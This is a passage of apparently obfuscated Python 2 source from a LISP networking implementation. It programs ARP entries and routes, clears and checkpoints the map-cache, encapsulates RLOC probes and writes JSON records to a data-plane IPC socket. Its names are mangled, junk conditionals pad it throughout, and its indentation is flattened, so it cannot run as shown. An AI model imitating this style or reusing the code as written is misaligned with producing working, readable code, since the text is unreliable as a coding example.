ooO0O = ooO0O . split ( "/" ) [ 0 ]
if 71 - 71: OOooOOo + I11i * O0 / o0oOOo0O0Ooo + I1IiiI + Ii1I
if 41 - 41: ooOoO0o * I1Ii111
if 40 - 40: OoOoOO00
if 60 - 60: IiII . i11iIiiIii * II111iiii . Ii1I
if 10 - 10: O0
if 65 - 65: I11i % i11iIiiIii + i11iIiiIii % II111iiii
if 95 - 95: I1Ii111 - I11i . II111iiii . i1IIi / II111iiii + Oo0Ooo
Ooo000Oooo0o0 = [ ]
o00OoO0 = commands . getoutput ( "arp -i vlan4094" ) . split ( "\n" )
for I111 in o00OoO0 :
if ( I111 . find ( "vlan4094" ) == - 1 ) : continue
if ( I111 . find ( "(incomplete)" ) == - 1 ) : continue
I1ii1I1II11II = I111 . split ( " " ) [ 0 ]
Ooo000Oooo0o0 . append ( I1ii1I1II11II )
if 83 - 83: I11i
if 39 - 39: o0oOOo0O0Ooo * iIii1I11I1II1
I1ii1I1II11II = None
oOoI1 = ooO0O
ooO0O = ooO0O . split ( "." )
for i1i1IIIIIIIi in range ( 1 , 255 ) :
ooO0O [ 3 ] = str ( i1i1IIIIIIIi )
O0o00o000oO = "." . join ( ooO0O )
if ( O0o00o000oO in Ooo000Oooo0o0 ) : continue
if ( O0o00o000oO == oOoI1 ) : continue
I1ii1I1II11II = O0o00o000oO
break
if 13 - 13: iII111i + Oo0Ooo / oO0o / OOooOOo
if ( I1ii1I1II11II == None ) :
lprint ( "Address allocation failed for vlan4094, cannot program " + "hardware" )
if 58 - 58: oO0o * I1ii11iIi11i % I1ii11iIi11i
return
if 16 - 16: I11i / I1IiiI % I1IiiI
if 78 - 78: O0 % i11iIiiIii / IiII
if 87 - 87: IiII % iIii1I11I1II1 * I1ii11iIi11i
if 43 - 43: Ii1I - IiII / i11iIiiIii + OoOoOO00 + I1ii11iIi11i - o0oOOo0O0Ooo
if 39 - 39: OoOoOO00 - i1IIi / oO0o % I11i * o0oOOo0O0Ooo * I1IiiI
if 79 - 79: Ii1I
if 56 - 56: I1ii11iIi11i
i1iI = OooO0ooO0o0OO . split ( "." )
Oo00o0oOooO = lisp_hex_string ( i1iI [ 1 ] ) . zfill ( 2 )
OoOo0OoOO0o = lisp_hex_string ( i1iI [ 2 ] ) . zfill ( 2 )
iIi1I1i = lisp_hex_string ( i1iI [ 3 ] ) . zfill ( 2 )
Oo0OOo = "00:00:00:{}:{}:{}" . format ( Oo00o0oOooO , OoOo0OoOO0o , iIi1I1i )
I111iII1I11II = "0000.00{}.{}{}" . format ( Oo00o0oOooO , OoOo0OoOO0o , iIi1I1i )
O00OO = "arp -i vlan4094 -s {} {}" . format ( I1ii1I1II11II , Oo0OOo )
os . system ( O00OO )
if 33 - 33: IiII
if 76 - 76: iII111i . OOooOOo . OoOoOO00 + O0
if 32 - 32: O0 * iIii1I11I1II1 - O0 % Ii1I
if 31 - 31: ooOoO0o
oOiIi1IIiIi1I11 = ( "mac address-table static {} vlan 4094 " + "interface vxlan 1 vtep {}" ) . format ( I111iII1I11II , OooO0ooO0o0OO )
if 40 - 40: I1IiiI + I1ii11iIi11i * I1IiiI % Ii1I
lisp_send_to_arista ( oOiIi1IIiIi1I11 , None )
if 27 - 27: O0 / Oo0Ooo . oO0o
if 34 - 34: I1Ii111 % Ii1I / Oo0Ooo % ooOoO0o / i11iIiiIii * I1IiiI
if 36 - 36: i11iIiiIii * i1IIi % iII111i . Oo0Ooo
if 54 - 54: o0oOOo0O0Ooo % i1IIi % I1ii11iIi11i . o0oOOo0O0Ooo / OoOoOO00
if 55 - 55: O0 / OoooooooOO % Ii1I * O0 + iIii1I11I1II1 . iIii1I11I1II1
O00i1IiIiiIiii = "ip route add {} via {}" . format ( OOi1 , I1ii1I1II11II )
os . system ( O00i1IiIiiIiii )
if 59 - 59: iIii1I11I1II1 . OoOoOO00 + ooOoO0o . OoooooooOO
lprint ( "Hardware programmed with commands:" )
O00i1IiIiiIiii = O00i1IiIiiIiii . replace ( OOi1 , green ( OOi1 , False ) )
lprint ( " " + O00i1IiIiiIiii )
lprint ( " " + O00OO )
oOiIi1IIiIi1I11 = oOiIi1IIiIi1I11 . replace ( OooO0ooO0o0OO , red ( OooO0ooO0o0OO , False ) )
lprint ( " " + oOiIi1IIiIi1I11 )
return
if 27 - 27: IiII . Oo0Ooo
if 70 - 70: ooOoO0o + OoooooooOO
if 17 - 17: iIii1I11I1II1
if 25 - 25: I1ii11iIi11i * I11i
if 33 - 33: oO0o / II111iiii
if 90 - 90: o0oOOo0O0Ooo - iIii1I11I1II1 + i1IIi - OoO0O00 + IiII
if 40 - 40: i11iIiiIii . i11iIiiIii - OoOoOO00 - oO0o
def lisp_clear_hardware_walk ( mc , parms ) :
O000 = mc . eid . print_prefix_no_iid ( )
os . system ( "ip route delete {}" . format ( O000 ) )
return ( [ True , None ] )
if 42 - 42: IiII + OoooooooOO / OoooooooOO . ooOoO0o / i11iIiiIii / II111iiii
if 10 - 10: iII111i . I1IiiI
if 74 - 74: II111iiii * O0
if 57 - 57: OoO0O00
if 12 - 12: o0oOOo0O0Ooo . I1Ii111 . oO0o % Oo0Ooo * OoooooooOO
if 25 - 25: OoO0O00
if 54 - 54: O0
if 20 - 20: ooOoO0o + Oo0Ooo - Oo0Ooo
def lisp_clear_map_cache ( ) :
global lisp_map_cache , lisp_rloc_probe_list
global lisp_crypto_keys_by_rloc_encap , lisp_crypto_keys_by_rloc_decap
global lisp_rtr_list , lisp_gleaned_groups
if 2 - 2: i1IIi - IiII . I1ii11iIi11i / i1IIi
o000o0O0O = bold ( "User cleared" , False )
OoO = lisp_map_cache . cache_count
lprint ( "{} map-cache with {} entries" . format ( o000o0O0O , OoO ) )
if 8 - 8: o0oOOo0O0Ooo
if ( lisp_program_hardware ) :
lisp_map_cache . walk_cache ( lisp_clear_hardware_walk , None )
if 52 - 52: IiII * OoooooooOO . oO0o + Oo0Ooo
lisp_map_cache = lisp_cache ( )
if 95 - 95: OoO0O00 * I1IiiI - Oo0Ooo . IiII
if 82 - 82: I11i
if 89 - 89: iIii1I11I1II1 . I11i + OOooOOo / i11iIiiIii / I1ii11iIi11i * i11iIiiIii
if 20 - 20: I1Ii111 . II111iiii % II111iiii
if 79 - 79: II111iiii . I11i + o0oOOo0O0Ooo % I1ii11iIi11i + I1ii11iIi11i
lisp_rloc_probe_list = { }
if 4 - 4: I1ii11iIi11i % OoooooooOO
if 43 - 43: IiII - I1Ii111 % ooOoO0o
if 49 - 49: OoOoOO00
if 43 - 43: I1Ii111 - Oo0Ooo % i1IIi . II111iiii
lisp_crypto_keys_by_rloc_encap = { }
lisp_crypto_keys_by_rloc_decap = { }
if 80 - 80: IiII . iII111i + I1Ii111 + iII111i % Oo0Ooo
if 98 - 98: i11iIiiIii . II111iiii + OoOoOO00
if 25 - 25: I1IiiI + i11iIiiIii . I1Ii111 - I1ii11iIi11i
if 67 - 67: OOooOOo - OOooOOo * I1IiiI - II111iiii . i1IIi + Oo0Ooo
if 97 - 97: O0 / i11iIiiIii - o0oOOo0O0Ooo - OoOoOO00 . oO0o
lisp_rtr_list = { }
if 77 - 77: oO0o * oO0o . OoOoOO00 . i1IIi
if 90 - 90: OOooOOo . Ii1I . II111iiii + Ii1I
if 2 - 2: I1Ii111 * OOooOOo + II111iiii - OoOoOO00
if 94 - 94: Ii1I - iII111i . I1ii11iIi11i - Oo0Ooo % o0oOOo0O0Ooo + I1Ii111
lisp_gleaned_groups = { }
if 58 - 58: oO0o . ooOoO0o . I1IiiI . Oo0Ooo * iIii1I11I1II1 - iII111i
if 96 - 96: OOooOOo % o0oOOo0O0Ooo / iIii1I11I1II1
if 60 - 60: i1IIi / iIii1I11I1II1 + I11i % iII111i
if 64 - 64: I11i . i11iIiiIii / iIii1I11I1II1 . I11i
lisp_process_data_plane_restart ( True )
return
if 73 - 73: OoO0O00 % iIii1I11I1II1 + IiII * I1Ii111 % II111iiii
if 20 - 20: I11i % I1ii11iIi11i . OoO0O00 % OoOoOO00
if 84 - 84: OoooooooOO / i11iIiiIii . IiII / I1IiiI
if 62 - 62: iII111i - I1IiiI + OoooooooOO
if 59 - 59: iIii1I11I1II1 + i11iIiiIii * oO0o . Oo0Ooo . I1Ii111
if 49 - 49: II111iiii
if 99 - 99: Oo0Ooo . OOooOOo
if 85 - 85: OoOoOO00 . IiII + oO0o - II111iiii
if 70 - 70: O0 % I1Ii111
if 13 - 13: I1ii11iIi11i % OoO0O00 / Ii1I * IiII
if 82 - 82: ooOoO0o % Oo0Ooo
def lisp_encapsulate_rloc_probe ( lisp_sockets , rloc , nat_info , packet ) :
if ( len ( lisp_sockets ) != 4 ) : return
if 26 - 26: OoO0O00 + i11iIiiIii % I11i . I1ii11iIi11i
OoO0OOo = lisp_myrlocs [ 0 ]
if 48 - 48: I1ii11iIi11i
if 69 - 69: oO0o + I11i * Ii1I
if 13 - 13: I1ii11iIi11i / Oo0Ooo - I1Ii111 * OoOoOO00
if 47 - 47: IiII
if 76 - 76: iII111i / II111iiii / I11i
iI1 = len ( packet ) + 28
iIiiIIi = struct . pack ( "BBHIBBHII" , 0x45 , 0 , socket . htons ( iI1 ) , 0 , 64 ,
17 , 0 , socket . htonl ( OoO0OOo . address ) , socket . htonl ( rloc . address ) )
iIiiIIi = lisp_ip_checksum ( iIiiIIi )
if 62 - 62: I1ii11iIi11i
O0OO0ooO00 = struct . pack ( "HHHH" , 0 , socket . htons ( LISP_CTRL_PORT ) ,
socket . htons ( iI1 - 20 ) , 0 )
if 100 - 100: iII111i / ooOoO0o / IiII % II111iiii
if 6 - 6: OoooooooOO - I1IiiI + OoooooooOO
if 89 - 89: oO0o % Oo0Ooo . O0 . ooOoO0o
if 46 - 46: IiII * I11i - OoO0O00 - Ii1I
packet = lisp_packet ( iIiiIIi + O0OO0ooO00 + packet )
if 93 - 93: iIii1I11I1II1 / o0oOOo0O0Ooo - I11i - OOooOOo % ooOoO0o
if 16 - 16: ooOoO0o * o0oOOo0O0Ooo - IiII + I1ii11iIi11i / o0oOOo0O0Ooo - O0
if 71 - 71: i1IIi
if 79 - 79: iII111i * O0 / Ii1I / O0 % i1IIi
packet . inner_dest . copy_address ( rloc )
packet . inner_dest . instance_id = 0xffffff
packet . inner_source . copy_address ( OoO0OOo )
packet . inner_ttl = 64
packet . outer_dest . copy_address ( rloc )
packet . outer_source . copy_address ( OoO0OOo )
packet . outer_version = packet . outer_dest . afi_to_version ( )
packet . outer_ttl = 64
packet . encap_port = nat_info . port if nat_info else LISP_DATA_PORT
if 52 - 52: OoooooooOO % oO0o - I11i % OoOoOO00 . II111iiii
ii11IiI = red ( rloc . print_address_no_iid ( ) , False )
if ( nat_info ) :
O0oo0OoOO = " {}" . format ( blue ( nat_info . hostname , False ) )
Ii1I11IiI1I1 = bold ( "RLOC-probe request" , False )
else :
O0oo0OoOO = ""
Ii1I11IiI1I1 = bold ( "RLOC-probe reply" , False )
if 62 - 62: Ii1I . I1ii11iIi11i . iII111i + I11i * o0oOOo0O0Ooo
if 56 - 56: oO0o * iIii1I11I1II1 . II111iiii - II111iiii + II111iiii - i11iIiiIii
lprint ( ( "Data encapsulate {} to {}{} port {} for " + "NAT-traversal" ) . format ( Ii1I11IiI1I1 , ii11IiI , O0oo0OoOO , packet . encap_port ) )
if 79 - 79: iII111i
if 29 - 29: Ii1I * I1Ii111 / OoO0O00 - O0 - i11iIiiIii * I1IiiI
if 2 - 2: OoOoOO00 . I1ii11iIi11i * I1ii11iIi11i
if 42 - 42: OoO0O00 . OoO0O00 + II111iiii - IiII - OOooOOo * Oo0Ooo
if 47 - 47: oO0o - OoooooooOO + iII111i
if ( packet . encode ( None ) == None ) : return
packet . print_packet ( "Send" , True )
if 69 - 69: I1ii11iIi11i - I1IiiI % oO0o + OOooOOo - I1Ii111
i1i1o0oO = lisp_sockets [ 3 ]
packet . send_packet ( i1i1o0oO , packet . outer_dest )
del ( packet )
return
if 81 - 81: OoO0O00
if 66 - 66: OoooooooOO * OoOoOO00 . iII111i + iIii1I11I1II1 * O0 % OOooOOo
if 72 - 72: iII111i * Oo0Ooo - i11iIiiIii . OoooooooOO
if 85 - 85: O0 * i1IIi
if 29 - 29: i11iIiiIii
if 34 - 34: OoOoOO00
if 17 - 17: oO0o * OoOoOO00 % OoO0O00 % I1IiiI * I11i
if 78 - 78: OoooooooOO . I1Ii111 + Ii1I - II111iiii - IiII / iIii1I11I1II1
def lisp_get_default_route_next_hops ( ) :
if 92 - 92: Ii1I
if 34 - 34: OOooOOo * OoooooooOO / I1ii11iIi11i
if 41 - 41: i1IIi
if 75 - 75: o0oOOo0O0Ooo . I1Ii111 - I1Ii111 % Ii1I * OoooooooOO
if ( lisp_is_macos ( ) ) :
OoOoOoo0OoO0 = "route -n get default"
O0OOo0o = commands . getoutput ( OoOoOoo0OoO0 ) . split ( "\n" )
O0OOOoOoO00 = I1i = None
for iI1IiI11Ii11i in O0OOo0o :
if ( iI1IiI11Ii11i . find ( "gateway: " ) != - 1 ) : O0OOOoOoO00 = iI1IiI11Ii11i . split ( ": " ) [ 1 ]
if ( iI1IiI11Ii11i . find ( "interface: " ) != - 1 ) : I1i = iI1IiI11Ii11i . split ( ": " ) [ 1 ]
if 100 - 100: OoO0O00 . Oo0Ooo
return ( [ [ I1i , O0OOOoOoO00 ] ] )
if 29 - 29: OoO0O00
if 34 - 34: O0 - o0oOOo0O0Ooo % OOooOOo . OoO0O00 % IiII
if 63 - 63: O0 % iIii1I11I1II1 . o0oOOo0O0Ooo . I1IiiI * Ii1I % i1IIi
if 47 - 47: II111iiii * I1ii11iIi11i
if 70 - 70: I1ii11iIi11i - o0oOOo0O0Ooo
OoOoOoo0OoO0 = "ip route | egrep 'default via'"
OoOoo0Ooo0O0o = commands . getoutput ( OoOoOoo0OoO0 ) . split ( "\n" )
if 71 - 71: I1ii11iIi11i * i1IIi
Oo0O00OOOO = [ ]
for ooOoo0o in OoOoo0Ooo0O0o :
if ( ooOoo0o . find ( " metric " ) != - 1 ) : continue
O0OooO0oo = ooOoo0o . split ( " " )
try :
OOoOo0o0oO = O0OooO0oo . index ( "via" ) + 1
if ( OOoOo0o0oO >= len ( O0OooO0oo ) ) : continue
ooo0OOOOo000 = O0OooO0oo . index ( "dev" ) + 1
if ( ooo0OOOOo000 >= len ( O0OooO0oo ) ) : continue
except :
continue
if 49 - 49: iII111i % iII111i . II111iiii - I1IiiI / O0
if 82 - 82: o0oOOo0O0Ooo + I1IiiI % I1Ii111 % iII111i + iII111i
Oo0O00OOOO . append ( [ O0OooO0oo [ ooo0OOOOo000 ] , O0OooO0oo [ OOoOo0o0oO ] ] )
if 71 - 71: Oo0Ooo / OoOoOO00 - I1ii11iIi11i
return ( Oo0O00OOOO )
if 32 - 32: iII111i
if 99 - 99: o0oOOo0O0Ooo . oO0o
if 9 - 9: oO0o % OoooooooOO
if 62 - 62: OoO0O00 / OoOoOO00 / I1Ii111 + Oo0Ooo - Ii1I
if 72 - 72: OoO0O00 + I11i / iII111i % OOooOOo
if 5 - 5: oO0o % OOooOOo
if 95 - 95: OoOoOO00 + OoooooooOO - O0 + o0oOOo0O0Ooo
def lisp_get_host_route_next_hop ( rloc ) :
OoOoOoo0OoO0 = "ip route | egrep '{} via'" . format ( rloc )
ooOoo0o = commands . getoutput ( OoOoOoo0OoO0 ) . split ( " " )
if 88 - 88: i11iIiiIii . iIii1I11I1II1
try : OO000o00 = ooOoo0o . index ( "via" ) + 1
except : return ( None )
if 57 - 57: Ii1I * iIii1I11I1II1
if ( OO000o00 >= len ( ooOoo0o ) ) : return ( None )
return ( ooOoo0o [ OO000o00 ] )
if 92 - 92: Ii1I % Ii1I . I11i / i1IIi % Oo0Ooo
if 25 - 25: o0oOOo0O0Ooo - OoO0O00 - OoOoOO00 - ooOoO0o
if 28 - 28: OOooOOo * ooOoO0o * OoooooooOO % IiII
if 9 - 9: OoooooooOO
if 92 - 92: I1Ii111 + O0 + OoO0O00 % IiII
if 31 - 31: Ii1I / Oo0Ooo - I1IiiI - I11i - i11iIiiIii
if 45 - 45: ooOoO0o - IiII / OoO0O00 / IiII
def lisp_install_host_route ( dest , nh , install ) :
install = "add" if install else "delete"
OoI1i1 = "none" if nh == None else nh
if 63 - 63: ooOoO0o . i11iIiiIii + iII111i . OoO0O00 / ooOoO0o % iII111i
lprint ( "{} host-route {}, nh {}" . format ( install . title ( ) , dest , OoI1i1 ) )
if 23 - 23: iIii1I11I1II1 - ooOoO0o / I11i * I11i
if ( nh == None ) :
O000Oo = "ip route {} {}/32" . format ( install , dest )
else :
O000Oo = "ip route {} {}/32 via {}" . format ( install , dest , nh )
if 62 - 62: OOooOOo - I1IiiI * oO0o + O0 / ooOoO0o * iIii1I11I1II1
os . system ( O000Oo )
return
if 25 - 25: I1Ii111 % Oo0Ooo + OoO0O00 % OOooOOo
if 85 - 85: I1IiiI . i11iIiiIii - ooOoO0o * I11i * OoOoOO00 * I11i
if 29 - 29: I1Ii111 * I1Ii111 . iII111i + o0oOOo0O0Ooo
if 57 - 57: I1Ii111 - IiII
if 89 - 89: oO0o + iII111i
if 52 - 52: OOooOOo % O0 * I1ii11iIi11i . I1ii11iIi11i / IiII
if 7 - 7: II111iiii
if 7 - 7: iIii1I11I1II1 . O0 + Ii1I % I1IiiI * O0 + OoO0O00
def lisp_checkpoint ( checkpoint_list ) :
if ( lisp_checkpoint_map_cache == False ) : return
if 3 - 3: Oo0Ooo * OoooooooOO * oO0o % OoOoOO00 * OoOoOO00 . ooOoO0o
iI1IiI11Ii11i = open ( lisp_checkpoint_filename , "w" )
for iIiiiIIiii in checkpoint_list :
iI1IiI11Ii11i . write ( iIiiiIIiii + "\n" )
if 16 - 16: ooOoO0o / o0oOOo0O0Ooo - O0 * I1IiiI
iI1IiI11Ii11i . close ( )
lprint ( "{} {} entries to file '{}'" . format ( bold ( "Checkpoint" , False ) ,
len ( checkpoint_list ) , lisp_checkpoint_filename ) )
return
if 13 - 13: iII111i . iII111i % O0 % o0oOOo0O0Ooo
if 99 - 99: OoO0O00 - OoOoOO00 + OoO0O00
if 67 - 67: I1Ii111
if 31 - 31: OoO0O00 * Oo0Ooo % O0 * II111iiii + ooOoO0o * I1IiiI
if 77 - 77: ooOoO0o
if 98 - 98: I1Ii111 + I1ii11iIi11i % OoO0O00 * Ii1I + iII111i
if 6 - 6: iII111i / iII111i . i11iIiiIii
if 12 - 12: I11i - OoO0O00
def lisp_load_checkpoint ( ) :
if ( lisp_checkpoint_map_cache == False ) : return
if ( os . path . exists ( lisp_checkpoint_filename ) == False ) : return
if 68 - 68: IiII - OoOoOO00
iI1IiI11Ii11i = open ( lisp_checkpoint_filename , "r" )
if 22 - 22: i1IIi . IiII
OoO = 0
for iIiiiIIiii in iI1IiI11Ii11i :
OoO += 1
o0OoO00 = iIiiiIIiii . split ( " rloc " )
OO000 = [ ] if ( o0OoO00 [ 1 ] in [ "native-forward\n" , "\n" ] ) else o0OoO00 [ 1 ] . split ( ", " )
if 8 - 8: IiII % o0oOOo0O0Ooo . i11iIiiIii
if 69 - 69: I1Ii111 / Ii1I - ooOoO0o
iio0OOoO0 = [ ]
for OooO0ooO0o0OO in OO000 :
IiIIIi = lisp_rloc ( False )
O0OooO0oo = OooO0ooO0o0OO . split ( " " )
IiIIIi . rloc . store_address ( O0OooO0oo [ 0 ] )
IiIIIi . priority = int ( O0OooO0oo [ 1 ] )
IiIIIi . weight = int ( O0OooO0oo [ 2 ] )
iio0OOoO0 . append ( IiIIIi )
if 38 - 38: II111iiii % OoooooooOO / OoooooooOO . Ii1I . Ii1I
if 13 - 13: oO0o - i1IIi / i1IIi + OoooooooOO
OoOoooooO00oo = lisp_mapping ( "" , "" , iio0OOoO0 )
if ( OoOoooooO00oo != None ) :
OoOoooooO00oo . eid . store_prefix ( o0OoO00 [ 0 ] )
OoOoooooO00oo . checkpoint_entry = True
OoOoooooO00oo . map_cache_ttl = LISP_NMR_TTL * 60
if ( iio0OOoO0 == [ ] ) : OoOoooooO00oo . action = LISP_NATIVE_FORWARD_ACTION
OoOoooooO00oo . add_cache ( )
continue
if 57 - 57: OoooooooOO / O0 + I1ii11iIi11i % I11i * oO0o / Ii1I
if 49 - 49: I1IiiI * ooOoO0o * OOooOOo + OoO0O00 + ooOoO0o
OoO -= 1
if 42 - 42: i1IIi . OoO0O00 % iII111i
if 57 - 57: I1ii11iIi11i / I1IiiI
iI1IiI11Ii11i . close ( )
lprint ( "{} {} map-cache entries from file '{}'" . format (
bold ( "Loaded" , False ) , OoO , lisp_checkpoint_filename ) )
return
if 69 - 69: iII111i - iII111i . OoO0O00 / oO0o - OoO0O00 + I1Ii111
if 98 - 98: iII111i . oO0o - O0 % I1IiiI . I1ii11iIi11i / i1IIi
if 72 - 72: I1IiiI / Oo0Ooo % IiII - O0 / O0 * O0
if 83 - 83: O0 / I1Ii111 - OoooooooOO
if 42 - 42: Ii1I / i1IIi - IiII / I1Ii111
if 39 - 39: OoooooooOO
if 4 - 4: iIii1I11I1II1 - Oo0Ooo / OOooOOo % OoooooooOO . Oo0Ooo - Oo0Ooo
if 41 - 41: II111iiii . o0oOOo0O0Ooo
if 92 - 92: Ii1I - O0 - i11iIiiIii + IiII % I1Ii111 + II111iiii
if 71 - 71: ooOoO0o * I1Ii111 + i11iIiiIii + i1IIi . I1IiiI
if 15 - 15: OoO0O00
if 37 - 37: OoO0O00 . OoooooooOO - OOooOOo
if 34 - 34: o0oOOo0O0Ooo + iIii1I11I1II1 / o0oOOo0O0Ooo / ooOoO0o
if 53 - 53: II111iiii / iIii1I11I1II1
def lisp_write_checkpoint_entry ( checkpoint_list , mc ) :
if ( lisp_checkpoint_map_cache == False ) : return
if 25 - 25: I1Ii111
iIiiiIIiii = "{} rloc " . format ( mc . eid . print_prefix ( ) )
if 58 - 58: OoOoOO00 * i1IIi
for IiIIIi in mc . rloc_set :
if ( IiIIIi . rloc . is_null ( ) ) : continue
iIiiiIIiii += "{} {} {}, " . format ( IiIIIi . rloc . print_address_no_iid ( ) ,
IiIIIi . priority , IiIIIi . weight )
if 20 - 20: IiII
if 81 - 81: I1Ii111 . i1IIi / o0oOOo0O0Ooo
if ( mc . rloc_set != [ ] ) :
iIiiiIIiii = iIiiiIIiii [ 0 : - 2 ]
elif ( mc . action == LISP_NATIVE_FORWARD_ACTION ) :
iIiiiIIiii += "native-forward"
if 30 - 30: i11iIiiIii . I1IiiI
if 5 - 5: Ii1I / O0 + iIii1I11I1II1
checkpoint_list . append ( iIiiiIIiii )
return
if 22 - 22: ooOoO0o . ooOoO0o * OOooOOo % OoOoOO00
if 51 - 51: OoOoOO00 . oO0o - OoOoOO00
if 79 - 79: iII111i
if 71 - 71: i1IIi / OoO0O00 / OOooOOo + I1Ii111
if 80 - 80: Oo0Ooo . iIii1I11I1II1 . OoooooooOO % iII111i . oO0o
if 10 - 10: i11iIiiIii * OoooooooOO . i11iIiiIii
if 35 - 35: OOooOOo * OOooOOo + o0oOOo0O0Ooo / i1IIi - I11i
def lisp_check_dp_socket ( ) :
IIIiiiIi = lisp_ipc_dp_socket_name
if ( os . path . exists ( IIIiiiIi ) == False ) :
oO000oOO0 = bold ( "does not exist" , False )
lprint ( "Socket '{}' {}" . format ( IIIiiiIi , oO000oOO0 ) )
return ( False )
if 81 - 81: OoOoOO00
return ( True )
if 18 - 18: Ii1I . I1Ii111 % OoooooooOO + OoooooooOO - I1IiiI % I1IiiI
if 51 - 51: iIii1I11I1II1 / I1IiiI
if 27 - 27: O0 . o0oOOo0O0Ooo / ooOoO0o / OoooooooOO % Ii1I
if 27 - 27: ooOoO0o / IiII + OoO0O00 + Ii1I % I1Ii111
if 86 - 86: O0 % i11iIiiIii - Ii1I * oO0o % OOooOOo * i1IIi
if 87 - 87: II111iiii
if 53 - 53: OoOoOO00 * i11iIiiIii / I1Ii111
def lisp_write_to_dp_socket ( entry ) :
try :
O00oOO = json . dumps ( entry )
oOo0o000O000oo = bold ( "Write IPC" , False )
lprint ( "{} record to named socket: '{}'" . format ( oOo0o000O000oo , O00oOO ) )
lisp_ipc_dp_socket . sendto ( O00oOO , lisp_ipc_dp_socket_name )
except :
lprint ( "Failed to write IPC record to named socket: '{}'" . format ( O00oOO ) )
if 3 - 3: Ii1I % IiII + O0 % iIii1I11I1II1
return
if 2 - 2: IiII - i1IIi * IiII % O0 / Ii1I
if 64 - 64: iII111i - Oo0Ooo
if 73 - 73: iIii1I11I1II1 * I1Ii111 * OoO0O00
if 68 - 68: ooOoO0o * Ii1I / I1ii11iIi11i * OoooooooOO + OoooooooOO . OoooooooOO
if 50 - 50: I1IiiI % o0oOOo0O0Ooo
if 1 - 1: II111iiii
if 22 - 22: I1Ii111 + iII111i
if 50 - 50: iII111i % OoOoOO00 - II111iiii + II111iiii / OoO0O00
if 69 - 69: Ii1I * II111iiii
def lisp_write_ipc_keys ( rloc ) :
oOo0O = rloc . rloc . print_address_no_iid ( )
IIi1I1iII111 = rloc . translated_port
if ( IIi1I1iII111 != 0 ) : oOo0O += ":" + str ( IIi1I1iII111 )
if ( lisp_rloc_probe_list . has_key ( oOo0O ) == False ) : return
if 24 - 24: I1Ii111 * I1ii11iIi11i . OOooOOo . I1IiiI - I1ii11iIi11i
for O0OooO0oo , o0OoO00 , II1IIiIiiI1iI in lisp_rloc_probe_list [ oOo0O ] :
OoOoooooO00oo = lisp_map_cache . lookup_cache ( o0OoO00 , True )
if ( OoOoooooO00oo == None ) : continue
lisp_write_ipc_map_cache ( True , OoOoooooO00oo )
if 56 - 56: I1IiiI * Oo0Ooo + OoO0O00 - oO0o * I1Ii111
return
if 68 - 68: ooOoO0o * i11iIiiIii * OOooOOo % iII111i
if 10 - 10: Ii1I / Oo0Ooo - i1IIi
if 11 - 11: I11i * iII111i
if 28 - 28: II111iiii + IiII / Oo0Ooo * I1IiiI - OOooOOo
if 2 - 2: oO0o + I11i / I1Ii111 . I11i
if 59 - 59: Ii1I
if 47 - 47: iII111i % iII111i
def lisp_write_ipc_map_cache ( add_or_delete , mc , dont_send = False ) :
if ( lisp_i_am_etr ) : return
if ( lisp_ipc_dp_socket == None ) : return
if ( lisp_check_dp_socket ( ) == False ) : return
if 81 - 81: oO0o / I1ii11iIi11i . OoooooooOO % II111iiii / oO0o
if 23 - 23: IiII + oO0o + o0oOOo0O0Ooo . I1ii11iIi11i / i11iIiiIii + iIii1I11I1II1
if 74 - 74: I11i % OOooOOo
if 57 - 57: O0 + I1IiiI + i11iIiiIii
oO0 = "add" if add_or_delete else "delete"
iIiiiIIiii = { "type" : "map-cache" , "opcode" : oO0 }
if 90 - 90: I1ii11iIi11i . OoO0O00 * iIii1I11I1II1 - Oo0Ooo
O0O0OOoO00 = ( mc . group . is_null ( ) == False )
if ( O0O0OOoO00 ) :
iIiiiIIiii [ "eid-prefix" ] = mc . group . print_prefix_no_iid ( )
iIiiiIIiii [ "rles" ] = [ ]
else :
iIiiiIIiii [ "eid-prefix" ] = mc . eid . print_prefix_no_iid ( )
iIiiiIIiii [ "rlocs" ] = [ ]
if 28 - 28: I1IiiI . ooOoO0o - ooOoO0o * OOooOOo . IiII
iIiiiIIiii [ "instance-id" ] = str ( mc . eid . instance_id )
if 16 - 16: iIii1I11I1II1 % i11iIiiIii / Ii1I % iIii1I11I1II1 / iII111i
if ( O0O0OOoO00 ) :
if ( len ( mc . rloc_set ) >= 1 and mc . rloc_set [ 0 ] . rle ) :
for Oo0000O00o0 in mc . rloc_set [ 0 ] . rle . rle_forwarding_list :
O0o00o000oO = Oo0000O00o0 . address . print_address_no_iid ( )
IIi1I1iII111 = str ( 4341 ) if Oo0000O00o0 . translated_port == 0 else str ( Oo0000O00o0 . translated_port )
if 27 - 27: II111iiii * OoooooooOO / Oo0Ooo % O0
O0OooO0oo = { "rle" : O0o00o000oO , "port" : IIi1I1iII111 }
iI1Ii1iiiII1II , II1iI = Oo0000O00o0 . get_encap_keys ( )
O0OooO0oo = lisp_build_json_keys ( O0OooO0oo , iI1Ii1iiiII1II , II1iI , "encrypt-key" )
iIiiiIIiii [ "rles" ] . append ( O0OooO0oo )
if 81 - 81: iII111i * i11iIiiIii % O0 / iIii1I11I1II1 . OoO0O00
if 24 - 24: I1ii11iIi11i + OoOoOO00 % ooOoO0o % I1IiiI * I1Ii111 - o0oOOo0O0Ooo
else :
for OooO0ooO0o0OO in mc . rloc_set :
if ( OooO0ooO0o0OO . rloc . is_ipv4 ( ) == False and OooO0ooO0o0OO . rloc . is_ipv6 ( ) == False ) :
continue
if 95 - 95: Oo0Ooo * IiII - I1IiiI
if ( OooO0ooO0o0OO . up_state ( ) == False ) : continue
if 37 - 37: Oo0Ooo - oO0o / I1ii11iIi11i . o0oOOo0O0Ooo * Ii1I
IIi1I1iII111 = str ( 4341 ) if OooO0ooO0o0OO . translated_port == 0 else str ( OooO0ooO0o0OO . translated_port )
if 95 - 95: i11iIiiIii - ooOoO0o / I11i / I1Ii111
O0OooO0oo = { "rloc" : OooO0ooO0o0OO . rloc . print_address_no_iid ( ) , "priority" :
str ( OooO0ooO0o0OO . priority ) , "weight" : str ( OooO0ooO0o0OO . weight ) , "port" :
IIi1I1iII111 }
iI1Ii1iiiII1II , II1iI = OooO0ooO0o0OO . get_encap_keys ( )
O0OooO0oo = lisp_build_json_keys ( O0OooO0oo , iI1Ii1iiiII1II , II1iI , "encrypt-key" )
iIiiiIIiii [ "rlocs" ] . append ( O0OooO0oo )
if 59 - 59: iII111i
if 59 - 59: Oo0Ooo - IiII
if 6 - 6: OOooOOo - I1IiiI . IiII
if ( dont_send == False ) : lisp_write_to_dp_socket ( iIiiiIIiii )
return ( iIiiiIIiii )
if 40 - 40: II111iiii
if 13 - 13: OoOoOO00
